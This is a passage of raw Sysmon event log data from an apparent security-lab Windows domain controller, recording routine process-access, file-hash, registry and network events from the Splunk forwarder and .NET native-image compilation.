Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=44B24A7743EB9EFAE2B2F78656D4F4B0,SHA256=559001F925D1790EF6BB1F4AE9A85EE9D5FF4AF3CCABDC41A7AC57DCF07A5F84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.228{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EBA6FED47CD5F96A9C23A409C91676F,SHA256=FD0C3684010D955034681F0F750D316A53C4DAC010A3ED6C765DEF9D585AB920,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.165{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.150{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.150{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000020615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.298{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61423-false10.0.1.12-8000- 23542300x800000000000000020614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:12.275{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=656443E02DF4F60953E7C8E52C38A6B2,SHA256=886B30EF5F08BC64394E5248574219119320A8A3C0E38AFF792463C90275DA67,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000020617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-SetValue2021-06-23 21:04:13.947{4DB9351A-9DDD-60D3-1100-00000000CF01}436C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d76873-0x52260f3d) 23542300x800000000000000020616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:13.431{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6E9AF748C6337000238925FDF0CDA71,SHA256=849A3498ED81A642086DF31FF0B92E19358129DA64CDCF7112EA8838F5C36BBA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:14.853{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CE-60D3-9E03-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:14.837{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1CE-60D3-9E03-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:14.837{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CE-60D3-9E03-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:14.618{4DB9351A-A1CB-60D3-9D03-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18e4-0\Microsoft.PowerShell.Editor.dll2021-06-23 21:04:14.618 23542300x800000000000000020618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:14.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6956B88020A83BC67BF53A4FFF6E9F7,SHA256=8771140858BFA54A46F72879958B5A85E1467EC1AAFC60102A0848FAD1499F61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.853{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE1448E79DD02AAFB8D7B85EDDD48EED,SHA256=BA7891394FCB3502D3F1472449D58B709C508A317C4FA02C13376CD0BDA10917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0404B871836C603B5B884269E48F4FC7,SHA256=1F18F3B377F911650D3BF0F33D1ED7E04BDD39CE1A67D15F157500B077B65416,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.118{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.103{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:15.103{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.775{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.759{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.759{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D0-60D3-A103-00000000CF01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.572{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D0-60D3-A003-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D0-60D3-A003-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.556{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D0-60D3-A003-00000000CF01}7072C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:16.447{4DB9351A-A1CF-60D3-9F03-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1980-0\Microsoft.PowerShell.GPowerShell.dll2021-06-23 21:04:16.447 23542300x800000000000000020628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:16.447{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B54E140FED223610D1789ACF6527025F,SHA256=AF3FC75BBEE73DF02B0B5DF9C24EB538FCB0DE66056645715A76A12DFA453975,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.822{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.822{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D1-60D3-A503-00000000CF01}2096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:17.759{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D1-60D3-A403-00000000CF01}2036C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C